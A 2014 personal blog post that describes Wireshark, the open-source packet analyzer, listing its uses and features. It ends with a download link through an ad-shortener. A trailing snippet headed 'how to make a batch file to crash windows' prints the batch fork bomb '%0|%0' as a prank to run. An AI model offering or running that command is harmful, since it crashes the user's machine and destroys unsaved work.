Monday, January 27, 2014

Wireshark

So for those of you who dont know what wireshark is here is a basic summary of it.Wireshark is a network packet analyzer. A network packet analyzer will try to capture network packets and tries to display that packet data as detailed as possible.
You could think of a network packet analyzer as a measuring device used to examine what's going on inside a network cable, just like a voltmeter is used by an electrician to examine what's going on inside an electric cable (but at a higher level, of course).
In the past, such tools were either very expensive, proprietary, or both. However, with the advent of Wireshark all that has changed.
Wireshark is maybe one of the best open source packet analyzers available today in my opinion but it has been around for a long time so there is a lot of supporters.
·        network administrators use it to troubleshoot network problems
·        network security engineers use it to examine security problems
·        developers use it to debug protocol implementations
·        people use it to learn network protocol internals
Beside these examples, Wireshark can be helpful in many other situations too.
Features
The following are some of the many features Wireshark provides:
·        Available for UNIX (linux) and Windows.
·        Capture live packet data from a network interface.
·        Open files containing packet data captured with tcpdump/WinDump, Wireshark, and a number of other packet capture programs.
·        Import packets from text files containing hex dumps of packet data.
·        Display packets with very detailed protocol information.
·        Save packet data captured.
·        Export some or all packets in a number of capture file formats.
·        Filter packets on many criteria.
·        Search for packets on many criteria.
·        Colorize packet display based on filters.
·        Create various statistics.

But  to really understand its power you have to start using it.

you can get wireshark here: http://adf.ly/chTEq


2 comments:

how to make a batch file to crash windows

here is the "code" %0|%0 paste that in a notepad and save it as whateveryou want.bat for example lol.bat by running this it...